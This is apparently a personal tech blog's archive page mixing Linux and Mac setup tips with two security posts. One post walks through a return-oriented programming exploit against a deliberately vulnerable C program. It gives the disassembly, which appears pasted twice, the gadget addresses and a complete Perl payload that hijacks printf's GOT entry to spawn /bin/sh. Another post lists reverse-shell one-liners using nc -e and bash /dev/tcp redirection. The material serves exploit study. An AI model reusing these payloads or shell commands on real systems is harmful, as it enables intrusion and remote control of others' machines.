Linux No comments yet

Jabberd on Debian

By on January 12th, 2012

When we setup “jabberd” on latest Ubuntu/Debian, we cannot find the jabber.cfg file as it is shown in the Debian administration guide (http://www.debian-administration.org/articles/42)

Instead of modifying jabber.cfg, we need to modify /etc/default/jabberd14 file. In the file, just modify the HOSTNAME field to refer to your host.

This setup resolves “Internal Delivery Error” problem.

Uncategorized 1 comment

Blogging

By on September 1st, 2011

Ah… my server was down for about 4 months, and also I deleted (by mistake) most of my old posts. Thankfully, I could get some old posts from my google Buzz.

Thanks Google Buzz!

Mac OS X 2 comments

Compiling binutils on Mac OS X

By on December 2nd, 2010

Recently, I had to compile binutils on Mac OS X, and figured out that some people might benefit from this summary. Here are some facts that we have to know when we compile binutils on Mac OS X.

1. Format string patch
Basically, you will not be able to build it (under latest Mac OS X and XCode), because of warning messages:

warning: format not a string literal and no format arguments.

This is due to the “gcc”‘s format string vulnerability checking. I checked the latest version of binutils (2.20.1), but string format patch is still not done. I tried to patch it manually, but there were so many spots! So, just use –disable-werror option to ignore the warnings.

2. Libiberty option
By default, libiberty headers are not going to be installed into $(prefix)/include dir. Thus I use libiberty libraries; I need to add –enable-install-libiberty option.

3. 32-bit compilation
By default, binutils are compiled into 64-bit binary on my Mac. (because it just follows the machine’s architecture). Since my ocaml compiler only support 32-bit on Mac, I have to compile the binutils in 32-bit mode as well. I use CC=”gcc -arch i386″ CXX=”g++ -arch i386″ option.

4. Target option
If you just build without target option, your binutils (including objdump) can only run on “Mach” binary. Thus, I give a target option to deal with other interesting binaries: –enable-targets=i386-elf,i386-pe.

All in all, this is my configuration option :D

./configure CC=”gcc -arch i386″ CXX=”g++ -arch i386″ –disable-werror –enable-install-libiberty –enable-targets=i386-elf,i386-pe

Hacking, Linux, Programming 3 comments

Advanced Return-Oriented Exploit

By on May 5th, 2010

This is a brief introduction to a cool little technique of buffer overflow exploit with the following conditions: the stack is not executable, the stack address is randomized, and the libc address is also randomized. In other words, we cannot simply use return-to-stack and return-to-libc.

A vulnerable program that I am going to use is a modified version of gera’s in [1]. Here, we do not have stack canary protection, but I am going to make it much harder by modifying the code a little bit: adding an exit system call, and employing stack and libc address randomization (ASLR). The modified version is shown below:

  1. #include <string.h>
  2. #include <stdlib.h>
  3. #include <stdio.h>
  4. int func(char *msg) {
  5.     char buf[80];
  6.     strcpy(buf,msg);
  7.     buf[0] = toupper(buf[0]);
  8.     strcpy(msg,buf);
  9.     printf(“Caps: %s\n,msg);
  10.     exit(1);
  11. }
  12. int main(int argv, char** argc) {
  13.     func(argc[1]);
  14. }

 

1. Vulnerability

There is a classic strcpy vulnerability in the func function. Two consecutive strcpy call enables us to write arbitrary values in an arbitrary address: first, modify the value of the msg from the first strcpy, and then write arbitrary values from the second strcpy. Note that overwriting the return address of func is not enough because it is protected with exit system call. It is more clear if you look at the disassembled version of the program:

  1. 080484b4 <func>:
  2.  80484b4:       55                      push   %ebp
  3.  80484b5:       89 e5                   mov    %esp,%ebp
  4.  80484b7:       83 ec 58                sub    $0×58,%esp
  5.  80484ba:       8b 45 08                mov    0×8(%ebp),%eax
  6.  80484bd:       89 44 24 04             mov    %eax,0×4(%esp)
  7.  80484c1:       8d 45 b0                lea    -0×50(%ebp),%eax
  8.  80484c4:       89 04 24                mov    %eax,(%esp)
  9.  80484c7:       e8 04 ff ff ff          call   80483d0 <strcpy@plt>
  10.  80484cc:       0f b6 45 b0             movzbl -0×50(%ebp),%eax
  11.  80484d0:       0f be c0                movsbl %al,%eax
  12.  80484d3:       89 04 24                mov    %eax,(%esp)
  13.  80484d6:       e8 d5 fe ff ff          call   80483b0 <toupper@plt>
  14.  80484db:       88 45 b0                mov    %al,-0×50(%ebp)
  15.  80484de:       8d 45 b0                lea    -0×50(%ebp),%eax
  16.  80484e1:       89 44 24 04             mov    %eax,0×4(%esp)
  17.  80484e5:       8b 45 08                mov    0×8(%ebp),%eax
  18.  80484e8:       89 04 24                mov    %eax,(%esp)
  19.  80484eb:       e8 e0 fe ff ff          call   80483d0 <strcpy@plt>
  20.  80484f0:       8b 45 08                mov    0×8(%ebp),%eax
  21.  80484f3:       89 44 24 04             mov    %eax,0×4(%esp)
  22.  80484f7:       c7 04 24 00 86 04 08    movl   $0×8048600,(%esp)
  23.  80484fe:       e8 dd fe ff ff          call   80483e0 <printf@plt>
  24.  8048503:       c7 04 24 01 00 00 00    movl   $0×1,(%esp)
  25.  804850a:       e8 e1 fe ff ff          call   80483f0 <exit@plt>
  26. 0804850f <main>:
  27.  804850f:       8d 4c 24 04             lea    0×4(%esp),%ecx
  28.  8048513:       83 e4 f0                and    $0xfffffff0,%esp
  29.  8048516:       ff 71 fc                pushl  -0×4(%ecx)
  30.  8048519:       55                      push   %ebp
  31.  804851a:       89 e5                   mov    %esp,%ebp
  32.  804851c:       51                      push   %ecx
  33.  804851d:       83 ec 14                sub    $0×14,%esp
  34.  8048520:       8b 41 04                mov    0×4(%ecx),%eax
  35.  8048523:       83 c0 04                add    $0×4,%eax
  36.  8048526:       8b 00                   mov    (%eax),%eax
  37.  8048528:       89 04 24                mov    %eax,(%esp)
  38.  804852b:       e8 84 ff ff ff          call   80484b4 <func>
  39.  8048530:       83 c4 14                add    $0×14,%esp
  40.  8048533:       59                      pop    %ecx
  41.  8048534:       5d                      pop    %ebp
  42.  8048535:       8d 61 fc                lea    -0×4(%ecx),%esp
  43.  8048538:       c3                      ret
  44. 080484b4 <func>:
  45.  80484b4:       55                      push   %ebp
  46.  80484b5:       89 e5                   mov    %esp,%ebp
  47.  80484b7:       83 ec 58                sub    $0×58,%esp
  48.  80484ba:       8b 45 08                mov    0×8(%ebp),%eax
  49.  80484bd:       89 44 24 04             mov    %eax,0×4(%esp)
  50.  80484c1:       8d 45 b0                lea    -0×50(%ebp),%eax
  51.  80484c4:       89 04 24                mov    %eax,(%esp)
  52.  80484c7:       e8 04 ff ff ff          call   80483d0 <strcpy@plt>
  53.  80484cc:       0f b6 45 b0             movzbl -0×50(%ebp),%eax
  54.  80484d0:       0f be c0                movsbl %al,%eax
  55.  80484d3:       89 04 24                mov    %eax,(%esp)
  56.  80484d6:       e8 d5 fe ff ff          call   80483b0 <toupper@plt>
  57.  80484db:       88 45 b0                mov    %al,-0×50(%ebp)
  58.  80484de:       8d 45 b0                lea    -0×50(%ebp),%eax
  59.  80484e1:       89 44 24 04             mov    %eax,0×4(%esp)
  60.  80484e5:       8b 45 08                mov    0×8(%ebp),%eax
  61.  80484e8:       89 04 24                mov    %eax,(%esp)
  62.  80484eb:       e8 e0 fe ff ff          call   80483d0 <strcpy@plt>
  63.  80484f0:       8b 45 08                mov    0×8(%ebp),%eax
  64.  80484f3:       89 44 24 04             mov    %eax,0×4(%esp)
  65.  80484f7:       c7 04 24 00 86 04 08    movl   $0×8048600,(%esp)
  66.  80484fe:       e8 dd fe ff ff          call   80483e0 <printf@plt>
  67.  8048503:       c7 04 24 01 00 00 00    movl   $0×1,(%esp)
  68.  804850a:       e8 e1 fe ff ff          call   80483f0 <exit@plt>
  69. 0804850f <main>:
  70.  804850f:       8d 4c 24 04             lea    0×4(%esp),%ecx
  71.  8048513:       83 e4 f0                and    $0xfffffff0,%esp
  72.  8048516:       ff 71 fc                pushl  -0×4(%ecx)
  73.  8048519:       55                      push   %ebp
  74.  804851a:       89 e5                   mov    %esp,%ebp
  75.  804851c:       51                      push   %ecx
  76.  804851d:       83 ec 14                sub    $0×14,%esp
  77.  8048520:       8b 41 04                mov    0×4(%ecx),%eax
  78.  8048523:       83 c0 04                add    $0×4,%eax
  79.  8048526:       8b 00                   mov    (%eax),%eax
  80.  8048528:       89 04 24                mov    %eax,(%esp)
  81.  804852b:       e8 84 ff ff ff          call   80484b4 <func>
  82.  8048530:       83 c4 14                add    $0×14,%esp
  83.  8048533:       59                      pop    %ecx
  84.  8048534:       5d                      pop    %ebp
  85.  8048535:       8d 61 fc                lea    -0×4(%ecx),%esp
  86.  8048538:       c3                      ret

 

2. Observation and Strategy

We can only modify a single memory region, but it must not be the return address because of the exit system call. There are several possible spots including dtors and GOT. In this example, I am going to overwrite GOT entry of printf function. GOT is typically in the code section of a program and its address is not randomized.

Now we can hijack the control flow when the printf is called, so the next step is to determine where to jump. We cannot simply return to libc because its address is randomized (we are not going to use brute force here). However, we know that the code section’s addresses are fixed, and we are going to use return-oriented programming technique described introduced by Hovav [2]. In this problem, we can only use the code section of this small program, thus there is very small number of gadgets available.

The return-oriented program that we are going to design runs as follows: 1) retrieve an address to libc’s strcpy function from the GOT, 2) compute the relative address from strcpy function to system function, 3) obtain the address of the system function from the step 1 and 2, 4) set up the stack to have a pointer to “/bin/sh” string, 5) jump to the system function using indirect call (call *%eax).

 

3. Gadgets

We are going to use the following 4 gadgets that we can find from the code section to perform the exploitation.

1)

  1. 0x80485a2 <__libc_csu_init+82>: add    $0xc,%esp
  2. 0x80485a5 <__libc_csu_init+85>: pop    %ebx
  3. 0x80485a6 <__libc_csu_init+86>: pop    %esi
  4. 0x80485a7 <__libc_csu_init+87>: pop    %edi
  5. 0x80485a8 <__libc_csu_init+88>: pop    %ebp
  6. 0x80485a9 <__libc_csu_init+89>: ret

2)

  1. 0x804838c <_init+44>:   pop    %eax
  2. 0x804838d <_init+45>:   pop    %ebx
  3. 0x804838e <_init+46>:   leave
  4. 0x804838f <_init+47>:   ret

3)

  1. 0x80485ce <__do_global_ctors_aux+30>:   add    0xf475fff8(%ebx),%eax
  2. 0x80485d4 <__do_global_ctors_aux+36>:   add    $0×4,%esp
  3. 0x80485d7 <__do_global_ctors_aux+39>:   pop    %ebx
  4. 0x80485d8 <__do_global_ctors_aux+40>:   pop    %ebp
  5. 0x80485d9 <__do_global_ctors_aux+41>:   ret

4)

  1. 0x80484af <frame_dummy+31>:     call   *%eax

 

4. Final Exploit

Using the above four gadgets, I introduce the following exploit. Note this exploit is not just a simple return-oriented programming exploit, there are many techniques involved:
1) It dynamically retrieves system function’s address from the GOT
2) changes the ebp register to point to the bss section so that we can control the esp and ebp continuously.
3) Set up the stack address to have enough space for system call.

First, the second gadget sets up the eax and ebx values that are used in the third gadget to compute the system function’s address. The result of the “add 0xf475fff8(%ebx), %eax” instruction must produce the address of system function in libc. Specifically, 0xf475fff8(%ebx) must point to the strcpy’s GOT entry, so the strcpy’s address in libc is added with the value in eax register.

Changing the ebp register in the first gadget is the most tricky part. In the first gadget, we set up the ebp to point to a writable bss section (More precisely, beyond the bss section). Since the address of 0x804a2e8 is a writable region, we can set the address for ebp and esp. In the second gadget, we can set up the esp value by using the leave instruction. Thus after the second gadget, both the ebp and the esp will point to the addresses of the bss section.

The final exploit in perl is shown below:

  1. print \xa2\x85\x04\x08″ . # First Gadget
  2. “AAAAAAAA” . # dummy
  3. \xe8\xa2\x04\x08″ . # set ebp, poing to line 9 of this exploit string
  4. \x8c\x83\x04\x08″ . # Second gadget
  5. \xc0\x52\xfc\xff” .\x14\xa0\x8e\x13AAAA” . “/bin/sh;”  . “A”x48 .
  6. \x10\xa0\x04\x08″ . # GOT entry address of printf
  7. \x30\xa0\x04\x08″x0xa0 . # dummy
  8. \xce\x85\x04\x08″ .
  9. \x30\xa0\x04\x08″x0x2 . # dummy
  10. \x30\xa0\x04\x08″ . # dummy ebp
  11. \xaf\x84\x04\x08″ . # call *%eax
  12. \x30\xa0\x04\x08″;

I also attach the binary file for people who are interested. :)
(Download)

5. Conclusion

There are many possible way of bypassing ASLR protections. Here, I present a way to exploit the return-oriented programming technique in a very limited environment: small code space, randomized stack and randomized libc.

Mac OS X 3 comments

gnuplot on Mac OS X (snow leopard)

By on April 23rd, 2010

When we install the gnuplot on Mac OS X from the source code, we encounter this strange error message:Undefined symbols:”_rl_forced_update_d​isplay”, referenced from:_restore_prompt in…When we install the gnuplot on Mac OS X from the source code, we encounter this strange error message:

Undefined symbols:
“_rl_forced_update_display”, referenced from:
_restore_prompt in command.o
“_rl_ding”, referenced from:
_alert in mouse.o
“_history_list”, referenced from:
_write_history_list in history.o
“_rl_complete_with_tilde_expansion”, referenced from:
_rl_complete_with_tilde_expansion$non_lazy_ptr in plot.o
“_rl_reset_after_signal”, referenced from:
_main in plot.o

This error is due to the readline library in Mac OS X.
If you look at the /usr/lib/libreadline.dylib file, the symlink is pointing at a library file that we do not know. (Seems not familiar to me) Thus, we can solve this problem by installing libreadline from the source, and change the symlink properly. In my case:

sudo ln -s /usr/local/lib/libreadline.6.1.dylib /usr/lib/libreadline.dylib

Mac OS X No comments yet

objdump (disassemble) in Mac OS X

By on April 22nd, 2010

There are two possible ways to do objdump in Mac OS X: 1) install GNU binutils; 2) use otool.1) Install GNU binutils from the source (download), or from the MacPort.2) Use otool, the Mac OS X…There are two possible ways to do objdump in Mac OS X: 1) install GNU binutils; 2) use otool.

1) Install GNU binutils from the source (download), or from the MacPort.

2) Use otool, the Mac OS X native utility. I summarize the usage of otool in the following:

disassemble text sections (= objdump -j .text -d <file>)

otool -tV <file>

disassemble a section (= objdump -j <section> -d <file>)

otool -V -s __text <section> <file>
print out the shared library dependencies (= ldd <file>)

otool -L <file>
print out the data sections (= objdump -j .data -s <file>)

otool -dv <file>

Mac OS X 2 comments

Netcat on Mac OS X

By on March 20th, 2010

netcat (nc) is a utility for arbitrary TCP and UDP connections and listens. According to the nc manual, -e option specifies filename  to exec after connect. Thus in general, we can easily make reverse shell by using this command:

nc <addr> <port> -e /bin/sh

However, nc on Mac does not have -e option.
Instead, Mac has enabled their bash network redirection (/dev/tcp or /dev/udp). Thus instead of using nc for reverse binding shell, we can simply use this command:

/bin/bash 0</dev/tcp/addr/port 1>&0 2>&0

Note this technique will not work on default Debian machines. You have to enable bash network redirection to use this.

Useful reference: http://shudder.daemonette.org/source/BashNP-Guide.txt

Mac OS X No comments yet

Instruction Reference Manual in Mac

By on February 24th, 2010

Mac OS X, xcode has instruction reference manuals for x86, ARM, and PowerPC by default.

open /Library/Application\ Support/Shark/Helpers/